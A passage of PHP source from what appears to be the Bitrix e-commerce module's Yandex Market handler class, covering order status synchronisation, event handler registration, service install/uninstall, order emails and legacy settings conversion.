"socketTimeout" => 30,
"streamTimeout" => 30,
"redirect" => true,
"redirectMax" => 5,
));
$arQuery = array(
"order" => array(
"status" => $status,
)
);
if($substatus)
$arQuery["order"]["substatus"] = $substatus;
if(strtolower(SITE_CHARSET) != 'utf-8')
$arQuery = $APPLICATION->ConvertCharsetArray($arQuery, SITE_CHARSET, 'utf-8');
$postData = '';
if($this->communicationFormat == self::JSON)
$postData = json_encode($arQuery);
$http->setHeader("Content-Type", "application/".$format);
$http->setHeader("Authorization", 'OAuth oauth_token="'.$this->oAuthToken.
'", oauth_client_id="'.$this->oAuthClientId.
'", oauth_login="'.$this->oAuthLogin.'"', false);
$result = $http->query("PUT", $url, $postData);
$errors = $http->getError();
if (!$result && !empty($errors))
{
$bResult = false;
$message = "HTTP ERROR: ";
foreach($errors as $errorCode => $errMes)
$message .= $errorCode.": ".$errMes;
}
else
{
$headerStatus = $http->getStatus();
if ($headerStatus == 200)
{
$message = GetMessage("SALE_YMH_STATUS").": ".$status;
if($substatus)
$message .= ' ['.$substatus.']';
$bResult = true;
}
else
{
$res = $http->getResult();
$message = "HTTP error code: ".$headerStatus."(".$res.")";
if($headerStatus == 403)
$this->notifyAdmin("SEND_STATUS_ERROR_403");
if($headerStatus == 500)
{
$intervalSeconds = 3600;
$timeToStart = ConvertTimeStamp(strtotime(date('Y-m-d H:i:s', time() + $intervalSeconds)), 'FULL');
\CAgent::AddAgent(
'\CSaleYMHandler::sendStatusAgent("'.$orderId.'","'.$status.'", "'.$substatus.'", "'.$this->siteId.'");',
'sale',
"N",
$intervalSeconds,
$timeToStart,
"Y",
$timeToStart
);
}
$bResult = false;
}
}
$this->log(
$bResult ? self::LOG_LEVEL_INFO : self::LOG_LEVEL_ERROR,
"YMARKET_STATUS_CHANGE",
$orderId,
$message
);
if(!$bResult)
{
if($order = $this->loadOrderByYandexOrderId($orderId))
{
$r = new \Bitrix\Sale\Result();
$r->addWarning(new \Bitrix\Main\Error($message, 'YMARKET_STATUS_CHANGE_ERROR'));
\Bitrix\Sale\EntityMarker::addMarker($order, $order, $r);
$order->setField('MARKED', 'Y');
$order->save();
}
}
return $bResult;
}
/**
* @param string $yandexOrderId
* @param string $yandexStatus
* @param string $substatus
* @param string $siteId
* @return string
*/
public static function sendStatusAgent($yandexOrderId, $yandexStatus, $substatus, $siteId)
{
$YMHandler = new CSaleYMHandler(
array("SITE_ID"=> $siteId)
);
$YMHandler->sendStatus($yandexOrderId, $yandexStatus, $substatus);
return '';
}
/**
* @param int $orderId
* @return array|false
* @throws \Bitrix\Main\ArgumentException
*/
public function getOrderInfo($orderId)
{
if(intval($orderId) <= 0)
return array();
$res = \Bitrix\Sale\Internals\OrderTable::getList(array(
'filter' => array(
'=ID' => $orderId,
'=SOURCE.TRADING_PLATFORM_ID' => YMarket\YandexMarket::getInstance()->getId()
),
'select' => array("LID", "XML_ID", "YANDEX_ID" => "SOURCE.EXTERNAL_ORDER_ID"),
'runtime' => array(
'SOURCE' => array(
'data_type' => '\Bitrix\Sale\TradingPlatform\OrderTable',
'reference' => array(
'ref.ORDER_ID' => 'this.ID',
),
'join_type' => 'left'
)
)
));
if($arOrder = $res->fetch())
return $arOrder;
return array();
}
/**
* @param int $orderId
* @return bool
*/
public static function isOrderFromYandex($orderId)
{
$arOrder = self::getOrderInfo($orderId);
return !empty($arOrder["YANDEX_ID"]);
}
/**
* @param \Bitrix\Main\Event $params
*/
public static function onSaleStatusOrderChange(Bitrix\Main\Event $params)
{
/** @var \Bitrix\Sale\Order $order */
$order = $params->getParameter("ENTITY");
$value = $params->getParameter("VALUE");
$oldValue = $params->getParameter("OLD_VALUE");
if($value == $oldValue)
return;
if($order->getId() <= 0)
return;
self::onSaleStatusOrder($order->getId(), $value);
}
/**
* @param \Bitrix\Main\Event $params
*/
public static function onSaleOrderCanceled(Bitrix\Main\Event $params)
{
global $USER;
/** @var \Bitrix\Sale\Order $order */
$order = $params->getParameter("ENTITY");
if($order->getId() <= 0)
return;
if(!$order->isCanceled())
return;
$arSubstatuses = self::getOrderSubstatuses();
$description = $order->getField('REASON_CANCELED');
if(strlen($description) <= 0 || !$USER->IsAdmin() || empty($arSubstatuses[$description]))
$description = "USER_CHANGED_MIND";
self::onSaleStatusOrder($order->getId(), "CANCELED", $description);
}
/**
* @param \Bitrix\Main\Event $params
*/
public static function onSaleShipmentDelivery(Bitrix\Main\Event $params)
{
/** @var \Bitrix\Sale\Shipment $shipment */
$shipment = $params->getParameter("ENTITY");
if($shipment->getId() <= 0)
return;
/** @var \Bitrix\Sale\ShipmentCollection $collection */
$collection = $shipment->getCollection();
if(!$collection->isAllowDelivery())
return;
self::onSaleStatusOrder($shipment->getField('ORDER_ID'), "ALLOW_DELIVERY");
}
/**
* @param \Bitrix\Main\Event $params
*/
public static function onSaleOrderPaid(Bitrix\Main\Event $params)
{
/** @var \Bitrix\Sale\Order $order */
$order = $params->getParameter("ENTITY");
if($order->getId() <= 0)
return;
if(!$order->isPaid())
return;
self::onSaleStatusOrder($order->getId(), "PAYED");
}
/**
* @param \Bitrix\Main\Event $params
*/
public static function onShipmentDeducted(Bitrix\Main\Event $params)
{
/** @var \Bitrix\Sale\Shipment $shipment */
$shipment = $params->getParameter("ENTITY");
if($shipment->getId() <= 0)
return;
/** @var \Bitrix\Sale\ShipmentCollection $collection */
$collection = $shipment->getCollection();
if(!$collection->isShipped())
return;
self::onSaleStatusOrder($shipment->getField('ORDER_ID'), "DEDUCTED");
}
/**
* Executes when order's status was changed in shop
* event OnSaleCancelOrder
* @param int $orderId Identifier
* @param string $status New status
* @param string $substatus Substatus.
* @return bool
*/
public function onSaleStatusOrder($orderId, $status, $substatus = false)
{
if(self::$isYandexRequest)
return false;
if(intval($orderId) <= 0)
return false;
$result = false;
$arOrder = self::getOrderInfo($orderId);
if(!empty($arOrder) && isset($arOrder["YANDEX_ID"]) && !self::$isYandexRequest)
{
$YMHandler = new CSaleYMHandler(
array("SITE_ID"=> $arOrder["LID"])
);
$settings = $YMHandler->getSettingsBySiteId($arOrder["LID"]);
if(!isset($settings["STATUS_OUT"][$status]) || strlen($settings["STATUS_OUT"][$status]) <= 0)
return false;
$yandexStatus = $settings["STATUS_OUT"][$status];
$YMHandler->sendStatus($arOrder["YANDEX_ID"], $yandexStatus, $substatus);
$result = true;
}
return $result;
}
public static function getOrderSubstatuses()
{
return array(
"USER_UNREACHABLE" => GetMessage("SALE_YMH_SUBSTATUS_USER_UNREACHABLE"),
"USER_CHANGED_MIND" => GetMessage("SALE_YMH_SUBSTATUS_USER_CHANGED_MIND"),
"USER_REFUSED_DELIVERY"=> GetMessage("SALE_YMH_SUBSTATUS_USER_REFUSED_DELIVERY"),
"USER_REFUSED_PRODUCT" => GetMessage("SALE_YMH_SUBSTATUS_USER_REFUSED_PRODUCT"),
"SHOP_FAILED" => GetMessage("SALE_YMH_SUBSTATUS_SHOP_FAILED"),
"REPLACING_ORDER" => GetMessage("SALE_YMH_SUBSTATUS_REPLACING_ORDER"),
"PROCESSING_EXPIRED" => GetMessage("SALE_YMH_SUBSTATUS_PROCESSING_EXPIRED"),
"RESERVATION_EXPIRED" => GetMessage("SALE_YMH_SUBSTATUS_RESERVATION_EXPIRED"),
"USER_NOT_PAID" => GetMessage("SALE_YMH_SUBSTATUS_USER_NOT_PAID"),
"USER_REFUSED_QUALITY" => GetMessage("SALE_YMH_SUBSTATUS_USER_REFUSED_QUALITY"),
);
}
public static function getCancelReasonsAsSelect($name, $val=false, $id=false)
{
$arStatuses = self::getOrderSubstatuses();
$result = '<select width="100%" name="'.$name.'"';
if($id !== false)
$result .= ' id="'.$id.'"';
$result .='>';
foreach ($arStatuses as $statusId => $statusName)
{
$result .='<option value="'.$statusId.'"';
if($val == $statusId)
$result .= ' selected';
$result .= '>'.$statusName.'</option>';
}
$result .='</select>';
return $result;
}
public static function getCancelReasonsAsRadio($name, $id=false, $val=false)
{
$result = "";
$arStatuses = self::getOrderSubstatuses();
$start = 0;
if($id === false)
$id = "cancelreasonid_".rand();
foreach ($arStatuses as $statusId => $statusName)
{
$tmpId = $id.'_'.($start++);
$result .=
'<label for="'.$tmpId.'">'.
'<input id="'.$tmpId.'" type="radio" name="'.$name.'_rb" value="'.$statusId.'">'.
'<span id="'.$tmpId.'_lbl">'.$statusName.'</span>'.
'</label><br>'.
'<script type="text/javascript">'.
'BX("'.$tmpId.'").onchange=function(){if(this.checked == true) { BX("'.$id.'").innerHTML = BX("'.$tmpId.'_lbl").innerHTML; }};'.
'</script>';
}
return $result;
}
public function OnEventLogGetAuditTypes()
{
return array(
"YMARKET_STATUS_CHANGE" => "[YMARKET_STATUS_CHANGE] ".GetMessage("SALE_YMH_LOG_TYPE_STATUS_CHANGE"),
"YMARKET_INCOMING_ORDER_STATUS" => "[YMARKET_INCOMING_ORDER_STATUS] ".GetMessage("SALE_YMH_LOG_TYPE_INCOMING_ORDER_STATUS"),
"YMARKET_USER_CREATE" => "[YMARKET_USER_CREATE] ".GetMessage("SALE_YMH_LOG_TYPE_USER_CREATE"),
"YMARKET_ORDER_CREATE" => "[YMARKET_ORDER_CREATE] ".GetMessage("SALE_YMH_LOG_TYPE_ORDER_CREATE"),
"YMARKET_REQUEST_ERROR" => "[YMARKET_REQUEST_ERROR] ".GetMessage("SALE_YMH_LOG_TYPE_REQUEST_ERROR"),
"YMARKET_INCOMING_REQUEST" => "[YMARKET_INCOMING_REQUEST] ".GetMessage("SALE_YMH_LOG_TYPE_INCOMING_REQUEST"),
"YMARKET_INCOMING_REQUEST_RESULT" => "[YMARKET_INCOMING_REQUEST_RESULT] ".GetMessage("SALE_YMH_LOG_TYPE_INCOMING_REQUEST_RESULT"),
"YMARKET_LOCATION_MAPPING" => "[YMARKET_LOCATION_MAPPING] ".GetMessage("SALE_YMH_LOG_TYPE_YMARKET_LOCATION_MAPPING"),
"YMARKET_ORDER_STATUS_CHANGE" => "[YMARKET_ORDER_STATUS_CHANGE] ".GetMessage("SALE_YMH_LOG_TYPE_ORDER_STATUS_CHANGE"),
"YMARKET_ORDER_CREATE_ERROR" => "[YMARKET_ORDER_CREATE_ERROR] ".GetMessage("SALE_YMH_LOG_TYPE_ORDER_CREATE_ERROR"),
);
}
/**
* @param int $level
* @param string $type
* @param string $itemId
* @param string $description
* @return bool
*/
protected function log($level, $type, $itemId, $description)
{
if($this->logLevel < $level)
return false;
CEventLog::Add(array(
"SEVERITY" => $level >= CSaleYMHandler::LOG_LEVEL_ERROR ? "WARNING" : "NOTICE",
"AUDIT_TYPE_ID" => $type,
"MODULE_ID" => "sale",
"ITEM_ID" => $itemId,
"DESCRIPTION" => $description,
));
return true;
}
/**
* @param array $order
* @param string $yandexStatus
* @param string $cancelReason
* @return bool|int
*/
protected function mapYandexStatusToOrder($order, $yandexStatus, $cancelReason="")
{
global $APPLICATION;
if(!is_array($order) || !isset($order["ID"]) || strlen($yandexStatus) <= 0)
return false;
$settings = $this->getSettingsBySiteId($order["LID"]);
if(!isset($settings["STATUS_IN"][$yandexStatus]) || strlen($settings["STATUS_IN"][$yandexStatus]) <= 0)
return false;
$result = false;
$bitrixStatus = $settings["STATUS_IN"][$yandexStatus];
switch($bitrixStatus)
{
/* flags */
case "CANCELED":
$errorMessageTmp = "";
$result = \CSaleOrder::CancelOrder($order["ID"], "Y", $cancelReason);
if (!$result)
{
if ($ex = $APPLICATION->GetException())
{
if ($ex->GetID() != "ALREADY_FLAG")
$errorMessageTmp .= $ex->GetString();
}
else
$errorMessageTmp .= GetMessage("ERROR_CANCEL_ORDER").". ";
}
if($errorMessageTmp != "")
{
$this->log(
self::LOG_LEVEL_ERROR,
"YMARKET_INCOMING_ORDER_STATUS",
$order["XML_ID"],
$errorMessageTmp
);
}
else
{
$this->log(
self::LOG_LEVEL_INFO,
"YMARKET_INCOMING_ORDER_STATUS",
$order["XML_ID"],
GetMessage("SALE_YMH_INCOMING_ORDER_STATUS_CANCELED").": ".$order["ID"]
);
}
break;
case "ALLOW_DELIVERY":
$result = CSaleOrder::DeliverOrder($order["ID"], "Y");
break;
case "PAYED":
$result = CSaleOrder::PayOrder($order["ID"], "Y");
break;
case "DEDUCTED":
$result = CSaleOrder::DeductOrder($order["ID"], "Y");
break;
/* statuses */
default:
if(CSaleStatus::GetByID($bitrixStatus))
{
$result = CSaleOrder::StatusOrder($order["ID"], $bitrixStatus);
}
break;
}
$this->log(
$result ? self::LOG_LEVEL_INFO : self::LOG_LEVEL_ERROR,
"YMARKET_ORDER_STATUS_CHANGE",
$order["ID"],
($result ? GetMessage("SALE_YMH_LOG_TYPE_ORDER_STATUS_CHANGE_OK") : GetMessage("SALE_YMH_LOG_TYPE_ORDER_STATUS_CHANGE_ERROR"))." (".$bitrixStatus.")"
);
return $result;
}
/**
* Starts exchange information between Yandex-market and shop
* @return bool
*/
public static function eventsStart()
{
$eventManager = \Bitrix\Main\EventManager::getInstance();
$eventManager->registerEventHandler('sale', 'OnSaleStatusOrderChange', 'sale', 'CSaleYMHandler', 'onSaleStatusOrderChange');
$eventManager->registerEventHandler('sale', 'OnSaleOrderCanceled', 'sale', 'CSaleYMHandler', 'onSaleOrderCanceled');
$eventManager->registerEventHandler('sale', 'OnSaleShipmentDelivery', 'sale', 'CSaleYMHandler', 'onSaleShipmentDelivery');
$eventManager->registerEventHandler('sale', 'OnSaleOrderPaid', 'sale', 'CSaleYMHandler', 'onSaleOrderPaid');
$eventManager->registerEventHandler('sale', 'OnShipmentDeducted', 'sale', 'CSaleYMHandler', 'onShipmentDeducted');
return true;
}
/**
* Stops exchange information between Yandex-market and shop
* @return bool
*/
public static function eventsStop()
{
$eventManager = \Bitrix\Main\EventManager::getInstance();
$eventManager->unRegisterEventHandler('sale', 'OnSaleStatusOrderChange', 'sale', 'CSaleYMHandler', 'onSaleStatusOrderChange');
$eventManager->unRegisterEventHandler('sale', 'OnSaleOrderCanceled', 'sale', 'CSaleYMHandler', 'onSaleOrderCanceled');
$eventManager->unRegisterEventHandler('sale', 'OnSaleShipmentDelivery', 'sale', 'CSaleYMHandler', 'onSaleShipmentDelivery');
$eventManager->unRegisterEventHandler('sale', 'OnSaleOrderPaid', 'sale', 'CSaleYMHandler', 'onSaleOrderPaid');
$eventManager->unRegisterEventHandler('sale', 'OnShipmentDeducted', 'sale', 'CSaleYMHandler', 'onShipmentDeducted');
return true;
}
/**
* Installs service
* @return bool
*/
public static function install()
{
$settings = static::getSettings();
if(empty($settings))
{
$res = Bitrix\Sale\TradingPlatformTable::add(array(
"CODE" => static::TRADING_PLATFORM_CODE,
"ACTIVE" => "N",
"NAME" => GetMessage("SALE_YMH_NAME"),
"DESCRIPTION" => GetMessage("SALE_YMH_DESCRIPTION"),
"SETTINGS" => "",
));
$b = "sort";
$o = "asc";
$dbSites = \CSite::GetList($b, $o, array("ACTIVE" => "Y"));
while ($site = $dbSites->Fetch())
{
\CUrlRewriter::Add(
array(
"CONDITION" => "#^/bitrix/services/ymarket/#",
"RULE" => "",
"ID" => "",
"PATH" => "/bitrix/services/ymarket/index.php",
"SITE_ID" => $site["ID"]
)
);
}
}
else
{
$res = true;
}
return $res ? true : false;
}
/**
* Uninstalls service
* @param bool $deleteRecord Delete, or not table record about this service
*/
public static function unInstall($deleteRecord = true)
{
static::eventsStop();
$settings = static::getSettings();
if(!empty($settings))
{
if($deleteRecord)
Bitrix\Sale\TradingPlatformTable::delete(static::TRADING_PLATFORM_CODE);
else
static::setActivity(false);
}
\CUrlRewriter::Delete(
array(
"CONDITION" => "#^/bitrix/services/ymarket/#",
"PATH" => "/bitrix/services/ymarket/index.php"
)
);
}
/**
* @param int $newOrderId
* @param $buyer
*/
protected function sendEmailNewOrder($newOrderId, $buyer)
{
global $DB;
$strOrderList = "";
$baseLangCurrency = Bitrix\Sale\Internals\SiteCurrencyTable::getSiteCurrency($this->siteId);
$orderNew = CSaleOrder::GetByID($newOrderId);
$orderNew["BASKET_ITEMS"] = array();
$userEmail = $buyer["email"];
$fio = $buyer["last-name"].(isset($buyer["first-name"]) ? $buyer["first-name"] : "");
$dbBasketTmp = CSaleBasket::GetList(
array("SET_PARENT_ID" => "DESC", "TYPE" => "DESC", "NAME" => "ASC"),
array("ORDER_ID" => $newOrderId),
false,
false,
array(
"ID", "PRICE", "QUANTITY", "NAME"
)
);
while ($arBasketTmp = $dbBasketTmp->GetNext())
{
$orderNew["BASKET_ITEMS"][] = $arBasketTmp;
}
$orderNew["BASKET_ITEMS"] = getMeasures($orderNew["BASKET_ITEMS"]);
foreach ($orderNew["BASKET_ITEMS"] as $val)
{
if (CSaleBasketHelper::isSetItem($val))
continue;
$measure = (isset($val["MEASURE_TEXT"])) ? $val["MEASURE_TEXT"] : GetMessage("SALE_YMH_SHT");
$strOrderList .= $val["NAME"]." - ".$val["QUANTITY"]." ".$measure." x ".SaleFormatCurrency($val["PRICE"], $baseLangCurrency);
$strOrderList .= "</br>";
}
//send mail
$arFields = array(
"ORDER_ID" => $orderNew["ACCOUNT_NUMBER"],
"ORDER_DATE" => Date($DB->DateFormatToPHP(CLang::GetDateFormat("SHORT", $this->siteId))),
"ORDER_USER" => $fio,
"PRICE" => SaleFormatCurrency($orderNew["PRICE"], $baseLangCurrency),
"BCC" => COption::GetOptionString("sale", "order_email", "order@".$_SERVER['SERVER_NAME']),
"EMAIL" => array("PAYER_NAME" => $fio, "USER_EMAIL" => $userEmail),
"ORDER_LIST" => $strOrderList,
"SALE_EMAIL" => COption::GetOptionString("sale", "order_email", "order@".$_SERVER['SERVER_NAME']),
"DELIVERY_PRICE" => $orderNew["DELIVERY_PRICE"],
);
$eventName = "SALE_NEW_ORDER";
$bSend = true;
foreach(GetModuleEvents("sale", "OnOrderNewSendEmail", true) as $arEvent)
if (ExecuteModuleEventEx($arEvent, array($newOrderId, &$eventName, &$arFields))===false)
$bSend = false;
if($bSend)
{
$event = new CEvent;
$event->Send($eventName, $this->siteId, $arFields, "N");
}
CSaleMobileOrderPush::send("ORDER_CREATED", array("ORDER" => $orderNew));
}
/**
* @param string $code
* @return bool
* @throws \Bitrix\Main\ArgumentNullException
*/
protected function notifyAdmin($code)
{
$tag = "YANDEX_MARKET_".$code;
$problemsCount = intval(Option::get("sale", $tag, 0, $this->siteId));
if($problemsCount < 3)
{
Option::set("sale", $tag, $problemsCount+1, $this->siteId);
return false;
}
$dbRes = CAdminNotify::GetList(array(), array("TAG" => $tag));
if($res = $dbRes->Fetch())
return false;
CAdminNotify::Add(array(
"MESSAGE" => GetMessage("SALE_YMH_ADMIN_NOTIFY_".$code, array("##LANGUAGE_ID##" => LANGUAGE_ID)),
"TAG" => "YANDEX_MARKET_".$code,
"MODULE_ID" => "SALE",
"ENABLE_CLOSE" => "Y"
)
);
Option::set("sale", $tag, 0, $this->siteId);
return true;
}
/**
* @return array
*/
public static function getExistPaymentMethods()
{
return array('YANDEX', 'CASH_ON_DELIVERY', 'CARD_ON_DELIVERY');
}
/** @deprecated */
public static function onSaleCancelOrder($orderId, $value, $description)
{
if($value != "Y" || self::$isYandexRequest)
return false;
global $USER;
$arSubstatuses = self::getOrderSubstatuses();
if(strlen($description) <= 0 || !$USER->IsAdmin() || empty($arSubstatuses[$description]))
$description = "USER_CHANGED_MIND";
return self::onSaleStatusOrder($orderId, "CANCELED", $description);
}
/** @deprecated */
public static function onSaleDeliveryOrder($orderId, $value)
{
if($value != "Y" || self::$isYandexRequest)
return false;
return self::onSaleStatusOrder($orderId, "ALLOW_DELIVERY");
}
/** @deprecated */
public static function onSalePayOrder($orderId, $value)
{
if($value != "Y" || self::$isYandexRequest)
return false;
return self::onSaleStatusOrder($orderId, "PAYED");
}
/** @deprecated */
public static function onSaleDeductOrder($orderId, $value)
{
if($value != "Y" || self::$isYandexRequest)
return false;
return self::onSaleStatusOrder($orderId, "DEDUCTED");
}
/** @deprecated */
protected function getDeliveryOptions($delivery, $price, $weight = 0)
{
$arResult = array();
$locationId = $this->locationMapper->getLocationId($delivery['region']);
if($locationId > 0)
{
foreach ($this->mapDelivery as $deliveryId => $deliveryType)
{
if($deliveryType == "")
continue;
$filter = array(
"ID" => $deliveryId,
"LID" => $this->siteId,
"ACTIVE" => "Y",
"LOCATION" => $locationId,
"+<=ORDER_PRICE_FROM" => $price,
"+>=ORDER_PRICE_TO" => $price
);
if(intval($weight) > 0)
{
$filter["+<=WEIGHT_FROM"] = $weight;
$filter["+>=WEIGHT_TO"] = $weight;
}
$dbDelivery = CSaleDelivery::GetList(
array("SORT"=>"ASC", "NAME"=>"ASC"),
$filter
);
if($arDelivery = $dbDelivery->Fetch())
{
$arDates = $this->getDeliveryDates(
$arDelivery["PERIOD_FROM"],
$arDelivery["PERIOD_TO"],
$arDelivery["PERIOD_TYPE"]
);
if(!empty($arDates))
{
$arDeliveryTmp = array(
"id" => $arDelivery["ID"],
"type" =>$deliveryType,
"serviceName" => substr($arDelivery["NAME"], 0, 50),
"price" => round(floatval($arDelivery["PRICE"]), 2),
"dates" => $arDates
);
if($deliveryType == "PICKUP" && !empty($this->outlets))
foreach($this->outlets as $outlet)
$arDeliveryTmp["outlets"][] = array("id" => intval($outlet));
$arResult[] = $arDeliveryTmp;
}
}
}
}
return $arResult;
}
/** @deprecated */
protected function getLocationByCityName($cityName)
{
return $this->locationMapper->getLocationByCityName($cityName);
}
/**
* Moves settings from options to DB
* @deprecated
*/
public static function settingsConverter()
{
$settings = static::getSettings();
if(!empty($settings) && !empty($settings["SETTINGS"]))
{
return false;
}
if(!CSaleYMHandler::install())
{
return false;
}
$settings = array();
$rsSites = CSite::GetList($by = "sort", $order = "asc", Array());
while ($arSite = $rsSites->Fetch())
{
$serSiteSett = COption::GetOptionString("sale", "yandex_market_purchase_settings", "", $arSite["ID"], true);
$siteSett = unserialize($serSiteSett);
if(is_array($siteSett) && !empty($siteSett))
$settings[$arSite["ID"]] = $siteSett;
}
if(empty($settings))
{
$serSiteSett = COption::GetOptionString("sale", "yandex_market_purchase_settings", "");
$siteSett = unserialize($serSiteSett);
if(is_array($siteSett) && !empty($siteSett))
$settings[CSite::GetDefSite()] = $siteSett;
}
if(empty($settings))
{
return false;
}
if(!CSaleYMHandler::saveSettings($settings))
{
return false;
}
if(!CSaleYMHandler::setActivity(true))
{
return false;
}
if(!CSaleYMHandler::eventsStart())
{
return false;
}
return true;
}
/**
* Take out correnspondence to
* @return string
* @deprecated
*/
public static function takeOutOrdersToCorrespondentTable()
{
$platformId = YMarket\YandexMarket::getInstance()->getId();
if(intval($platformId) <= 0)
return "";
$conn = \Bitrix\Main\Application::getConnection();
$helper = $conn->getSqlHelper();
$correspondence = $conn->query(
'SELECT ID
FROM '.$helper->quote(\Bitrix\Sale\TradingPlatform\OrderTable::getTableName()).'
WHERE '.$helper->quote('TRADING_PLATFORM_ID').'='.$platformId
);
//check if we already tried to convert
if ($correspondence->fetch())
return "";
if($conn->getType() == "mssql")
$lenOpName = "LEN";
else
$lenOpName = "LENGTH";
if($conn->getType() == "oracle")
$right = 'SUBSTR(XML_ID, -('.$lenOpName.'(XML_ID)-'.strlen(self::XML_ID_PREFIX).'))';
else
$right = 'RIGHT(XML_ID, '.$lenOpName.'(XML_ID)-'.strlen(self::XML_ID_PREFIX).')';
//take out correspondence to
$sql = 'INSERT INTO '.\Bitrix\Sale\TradingPlatform\OrderTable::getTableName().' (ORDER_ID, EXTERNAL_ORDER_ID, TRADING_PLATFORM_ID)
SELECT ID, '.$right.', '.$platformId.'
FROM '.\Bitrix\Sale\Internals\OrderTable::getTableName().'
WHERE XML_ID LIKE '."'".self::XML_ID_PREFIX."%'";
try
{
$conn->queryExecute($sql);
}
catch(\Bitrix\Main\DB\SqlQueryException $e)
{
CEventLog::Add(array(
"SEVERITY" => "ERROR",
"AUDIT_TYPE_ID" => "YMARKET_XML_ID_CONVERT_INSERT_ERROR",
"MODULE_ID" => "sale",
"ITEM_ID" => "YMARKET",
"DESCRIPTION" => __FILE__.': '.$e->getMessage(),
));
}
return "";
}
/** @internal */
public static function convertDeliveryAndPSIds()
{
if(\Bitrix\Main\Config\Option::get("sale", 'YANDEX_MARKET_DELIVERY_PS_IDS_CONVERTED', 'N') == 'Y')
return '';
$settings = \CSaleYMHandler::getSettings(false);
if(!empty($settings['SETTINGS']) && is_array($settings['SETTINGS']))
{
$message = '';
foreach($settings['SETTINGS'] as $siteId => $siteSettings)
{
if(!empty($siteSettings['DELIVERIES']) && is_array($siteSettings['DELIVERIES']))
{
$newDeliveries = array();
$message .= 'Deliveries ids converted: ';
foreach($siteSettings['DELIVERIES'] as $oldId => $type)
{
$newId = \Bitrix\Sale\Delivery\Services\Manager::getIdByCode($oldId);
$message .= $oldId.'->'.$newId.', ';
if(intval($newId) > 0)
$newDeliveries[$newId] = $type;
}
$settings['SETTINGS'][$siteId]['DELIVERIES'] = $newDeliveries;
}
}
if(!empty($message))
{
CEventLog::Add(array(
"SEVERITY" => "INFO",
"AUDIT_TYPE_ID" => "YANDEX_MARKET_DELIVERY_PS_IDS_CONVERTED",
"MODULE_ID" => "sale",
"ITEM_ID" => "YMARKET",
"DESCRIPTION" => $message,
));
$res = Bitrix\Sale\TradingPlatformTable::update(
YMarket\YandexMarket::getInstance()->getId(),
array("SETTINGS" => $settings['SETTINGS'])
);
if($res->isSuccess())
\Bitrix\Main\Config\Option::set("sale", 'YANDEX_MARKET_DELIVERY_PS_IDS_CONVERTED', 'Y');
}
}
return '';
}
/**
* @param string $yandexOrderId
* @return \Bitrix\Sale\Order|null
*/
public function loadOrderByYandexOrderId($yandexOrderId)
{
if (strlen($yandexOrderId) <= 0)
return null;
$filter = array(
'filter' => array(
'=SOURCE.EXTERNAL_ORDER_ID' => $yandexOrderId,
'=SOURCE.TRADING_PLATFORM_ID' => YMarket\YandexMarket::getInstance()->getId()
),
'select' => array('*'),
'runtime' => array(
'SOURCE' => array(
'data_type' => '\Bitrix\Sale\TradingPlatform\OrderTable',
'reference' => array(
'ref.ORDER_ID' => 'this.ID',
),
'join_type' => 'left'
)
)
);
$list = \Bitrix\Sale\Order::loadByFilter($filter);
if (!empty($list) && is_array($list))
return reset($list);
return null;
}
/**
* Returns true if it is yandex request
* @return bool
*/
public static function isYandexRequest()
{
return self::$isYandexRequest;
}
}